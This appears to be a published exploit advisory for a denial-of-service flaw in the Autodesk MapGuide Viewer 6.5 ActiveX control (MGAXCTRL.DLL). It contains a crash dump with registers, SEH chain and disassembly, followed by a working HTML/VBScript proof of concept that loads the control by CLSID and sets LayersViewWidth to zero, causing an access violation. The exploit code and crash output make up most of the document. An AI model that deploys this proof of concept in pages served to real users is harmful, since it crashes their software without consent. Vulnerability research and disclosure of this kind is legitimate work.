Autodesk MapGuide Viewer - ActiveX Denial of Service

 
# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability 
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys





Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E	CMP DWORD PTR [ESI+1C],0	(MGAXCTRL.DLL)

Seh Chain:
--------------------------------------------------
1 	192847C 	MGAXCTRL.DLL
2 	73352542 	VBSCRIPT.dll
3 	7C839AD8 	KERNEL32.dll



Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644



ArgDump:
--------------------------------------------------
EBP+8	003EB644 -> 0193F90C
EBP+12	00000000
EBP+16	0013EAD4 -> 00130000
EBP+20	0042C4F4 -> 00110024
EBP+24	0013EA94 -> 0013EAD4
EBP+28	0013EB30 -> 0013EBC0


Block Disassembly: 
--------------------------------------------------
175CE8F	POP ESI
175CE90	JMP [EAX+60]
175CE93	PUSH ESI
175CE94	LEA ESI,[ECX+404]
175CE9A	TEST ESI,ESI
175CE9C	JE SHORT 0175CEC2
175CE9E	CMP DWORD PTR [ESI+1C],0	  <--- CRASH
175CEA2	JE SHORT 0175CEC2
175CEA4	PUSH 0
175CEA6	PUSH DWORD PTR [ESP+C]
175CEAA	MOV ECX,ESI
175CEAC	PUSH 0
175CEAE	CALL 01912C63
175CEB3	MOV EAX,[ESI]
175CEB5	MOV ECX,ESI





PoC:


<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype  = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid     = "MGMapControl.MGMap"
argCount   = 1

arg1=0

target.LayersViewWidth = arg1

</script>